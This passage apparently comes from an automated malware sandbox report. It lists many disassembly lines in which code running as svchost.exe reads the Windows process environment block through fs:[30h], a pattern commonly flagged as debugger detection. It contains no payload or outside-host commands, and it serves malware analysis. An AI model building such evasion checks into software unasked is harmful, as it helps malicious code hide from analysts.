            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFA352 mov eax, dword ptr fs:[00000030h]2_2_02DFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD8350 mov ecx, dword ptr fs:[00000030h]2_2_02DD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD437C mov eax, dword ptr fs:[00000030h]2_2_02DD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E0634F mov eax, dword ptr fs:[00000030h]2_2_02E0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2C310 mov ecx, dword ptr fs:[00000030h]2_2_02D2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E08324 mov eax, dword ptr fs:[00000030h]2_2_02E08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E08324 mov ecx, dword ptr fs:[00000030h]2_2_02E08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E08324 mov eax, dword ptr fs:[00000030h]2_2_02E08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E08324 mov eax, dword ptr fs:[00000030h]2_2_02E08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D50310 mov ecx, dword ptr fs:[00000030h]2_2_02D50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A30B mov eax, dword ptr fs:[00000030h]2_2_02D6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A30B mov eax, dword ptr fs:[00000030h]2_2_02D6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A30B mov eax, dword ptr fs:[00000030h]2_2_02D6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB20DE mov eax, dword ptr fs:[00000030h]2_2_02DB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2C0F0 mov eax, dword ptr fs:[00000030h]2_2_02D2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D720F0 mov ecx, dword ptr fs:[00000030h]2_2_02D720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_02D2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D380E9 mov eax, dword ptr fs:[00000030h]2_2_02D380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB60E0 mov eax, dword ptr fs:[00000030h]2_2_02DB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3208A mov eax, dword ptr fs:[00000030h]2_2_02D3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF60B8 mov eax, dword ptr fs:[00000030h]2_2_02DF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF60B8 mov ecx, dword ptr fs:[00000030h]2_2_02DF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D280A0 mov eax, dword ptr fs:[00000030h]2_2_02D280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC80A8 mov eax, dword ptr fs:[00000030h]2_2_02DC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D32050 mov eax, dword ptr fs:[00000030h]2_2_02D32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6050 mov eax, dword ptr fs:[00000030h]2_2_02DB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5C073 mov eax, dword ptr fs:[00000030h]2_2_02D5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E016 mov eax, dword ptr fs:[00000030h]2_2_02D4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E016 mov eax, dword ptr fs:[00000030h]2_2_02D4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E016 mov eax, dword ptr fs:[00000030h]2_2_02D4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E016 mov eax, dword ptr fs:[00000030h]2_2_02D4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB4000 mov ecx, dword ptr fs:[00000030h]2_2_02DB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC6030 mov eax, dword ptr fs:[00000030h]2_2_02DC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A020 mov eax, dword ptr fs:[00000030h]2_2_02D2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2C020 mov eax, dword ptr fs:[00000030h]2_2_02D2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E061E5 mov eax, dword ptr fs:[00000030h]2_2_02E061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02DAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02DAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_02DAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02DAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02DAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF61C3 mov eax, dword ptr fs:[00000030h]2_2_02DF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF61C3 mov eax, dword ptr fs:[00000030h]2_2_02DF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D601F8 mov eax, dword ptr fs:[00000030h]2_2_02D601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB019F mov eax, dword ptr fs:[00000030h]2_2_02DB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB019F mov eax, dword ptr fs:[00000030h]2_2_02DB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB019F mov eax, dword ptr fs:[00000030h]2_2_02DB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB019F mov eax, dword ptr fs:[00000030h]2_2_02DB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A197 mov eax, dword ptr fs:[00000030h]2_2_02D2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A197 mov eax, dword ptr fs:[00000030h]2_2_02D2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A197 mov eax, dword ptr fs:[00000030h]2_2_02D2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D70185 mov eax, dword ptr fs:[00000030h]2_2_02D70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEC188 mov eax, dword ptr fs:[00000030h]2_2_02DEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEC188 mov eax, dword ptr fs:[00000030h]2_2_02DEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD4180 mov eax, dword ptr fs:[00000030h]2_2_02DD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD4180 mov eax, dword ptr fs:[00000030h]2_2_02DD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2C156 mov eax, dword ptr fs:[00000030h]2_2_02D2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC8158 mov eax, dword ptr fs:[00000030h]2_2_02DC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04164 mov eax, dword ptr fs:[00000030h]2_2_02E04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E04164 mov eax, dword ptr fs:[00000030h]2_2_02E04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36154 mov eax, dword ptr fs:[00000030h]2_2_02D36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36154 mov eax, dword ptr fs:[00000030h]2_2_02D36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov eax, dword ptr fs:[00000030h]2_2_02DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov eax, dword ptr fs:[00000030h]2_2_02DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov ecx, dword ptr fs:[00000030h]2_2_02DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov eax, dword ptr fs:[00000030h]2_2_02DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov eax, dword ptr fs:[00000030h]2_2_02DC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA118 mov ecx, dword ptr fs:[00000030h]2_2_02DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA118 mov eax, dword ptr fs:[00000030h]2_2_02DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA118 mov eax, dword ptr fs:[00000030h]2_2_02DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA118 mov eax, dword ptr fs:[00000030h]2_2_02DDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF0115 mov eax, dword ptr fs:[00000030h]2_2_02DF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov ecx, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov ecx, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov ecx, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov ecx, dword ptr fs:[00000030h]2_2_02DDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D60124 mov eax, dword ptr fs:[00000030h]2_2_02D60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_02D6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A6C7 mov eax, dword ptr fs:[00000030h]2_2_02D6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02DAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02DAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02DAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02DAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB06F1 mov eax, dword ptr fs:[00000030h]2_2_02DB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB06F1 mov eax, dword ptr fs:[00000030h]2_2_02DB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34690 mov eax, dword ptr fs:[00000030h]2_2_02D34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34690 mov eax, dword ptr fs:[00000030h]2_2_02D34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D666B0 mov eax, dword ptr fs:[00000030h]2_2_02D666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C6A6 mov eax, dword ptr fs:[00000030h]2_2_02D6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4C640 mov eax, dword ptr fs:[00000030h]2_2_02D4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D62674 mov eax, dword ptr fs:[00000030h]2_2_02D62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF866E mov eax, dword ptr fs:[00000030h]2_2_02DF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF866E mov eax, dword ptr fs:[00000030h]2_2_02DF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A660 mov eax, dword ptr fs:[00000030h]2_2_02D6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A660 mov eax, dword ptr fs:[00000030h]2_2_02D6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72619 mov eax, dword ptr fs:[00000030h]2_2_02D72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE609 mov eax, dword ptr fs:[00000030h]2_2_02DAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E627 mov eax, dword ptr fs:[00000030h]2_2_02D4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D66620 mov eax, dword ptr fs:[00000030h]2_2_02D66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D68620 mov eax, dword ptr fs:[00000030h]2_2_02D68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3262C mov eax, dword ptr fs:[00000030h]2_2_02D3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3C7C0 mov eax, dword ptr fs:[00000030h]2_2_02D3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB07C3 mov eax, dword ptr fs:[00000030h]2_2_02DB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D347FB mov eax, dword ptr fs:[00000030h]2_2_02D347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D347FB mov eax, dword ptr fs:[00000030h]2_2_02D347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D527ED mov eax, dword ptr fs:[00000030h]2_2_02D527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D527ED mov eax, dword ptr fs:[00000030h]2_2_02D527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D527ED mov eax, dword ptr fs:[00000030h]2_2_02D527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBE7E1 mov eax, dword ptr fs:[00000030h]2_2_02DBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD678E mov eax, dword ptr fs:[00000030h]2_2_02DD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D307AF mov eax, dword ptr fs:[00000030h]2_2_02D307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE47A0 mov eax, dword ptr fs:[00000030h]2_2_02DE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30750 mov eax, dword ptr fs:[00000030h]2_2_02D30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBE75D mov eax, dword ptr fs:[00000030h]2_2_02DBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72750 mov eax, dword ptr fs:[00000030h]2_2_02D72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72750 mov eax, dword ptr fs:[00000030h]2_2_02D72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB4755 mov eax, dword ptr fs:[00000030h]2_2_02DB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6674D mov esi, dword ptr fs:[00000030h]2_2_02D6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6674D mov eax, dword ptr fs:[00000030h]2_2_02D6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6674D mov eax, dword ptr fs:[00000030h]2_2_02D6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38770 mov eax, dword ptr fs:[00000030h]2_2_02D38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30710 mov eax, dword ptr fs:[00000030h]2_2_02D30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D60710 mov eax, dword ptr fs:[00000030h]2_2_02D60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C700 mov eax, dword ptr fs:[00000030h]2_2_02D6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6273C mov eax, dword ptr fs:[00000030h]2_2_02D6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6273C mov ecx, dword ptr fs:[00000030h]2_2_02D6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6273C mov eax, dword ptr fs:[00000030h]2_2_02D6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAC730 mov eax, dword ptr fs:[00000030h]2_2_02DAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C720 mov eax, dword ptr fs:[00000030h]2_2_02D6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C720 mov eax, dword ptr fs:[00000030h]2_2_02D6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D304E5 mov ecx, dword ptr fs:[00000030h]2_2_02D304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEA49A mov eax, dword ptr fs:[00000030h]2_2_02DEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D644B0 mov ecx, dword ptr fs:[00000030h]2_2_02D644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBA4B0 mov eax, dword ptr fs:[00000030h]2_2_02DBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D364AB mov eax, dword ptr fs:[00000030h]2_2_02D364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEA456 mov eax, dword ptr fs:[00000030h]2_2_02DEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2645D mov eax, dword ptr fs:[00000030h]2_2_02D2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5245A mov eax, dword ptr fs:[00000030h]2_2_02D5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5A470 mov eax, dword ptr fs:[00000030h]2_2_02D5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5A470 mov eax, dword ptr fs:[00000030h]2_2_02D5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5A470 mov eax, dword ptr fs:[00000030h]2_2_02D5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBC460 mov ecx, dword ptr fs:[00000030h]2_2_02DBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D68402 mov eax, dword ptr fs:[00000030h]2_2_02D68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D68402 mov eax, dword ptr fs:[00000030h]2_2_02D68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D68402 mov eax, dword ptr fs:[00000030h]2_2_02D68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A430 mov eax, dword ptr fs:[00000030h]2_2_02D6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2E420 mov eax, dword ptr fs:[00000030h]2_2_02D2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2E420 mov eax, dword ptr fs:[00000030h]2_2_02D2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2E420 mov eax, dword ptr fs:[00000030h]2_2_02D2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2C427 mov eax, dword ptr fs:[00000030h]2_2_02D2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6420 mov eax, dword ptr fs:[00000030h]2_2_02DB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D365D0 mov eax, dword ptr fs:[00000030h]2_2_02D365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02D6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02D6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E5CF mov eax, dword ptr fs:[00000030h]2_2_02D6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E5CF mov eax, dword ptr fs:[00000030h]2_2_02D6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02D5E5E7
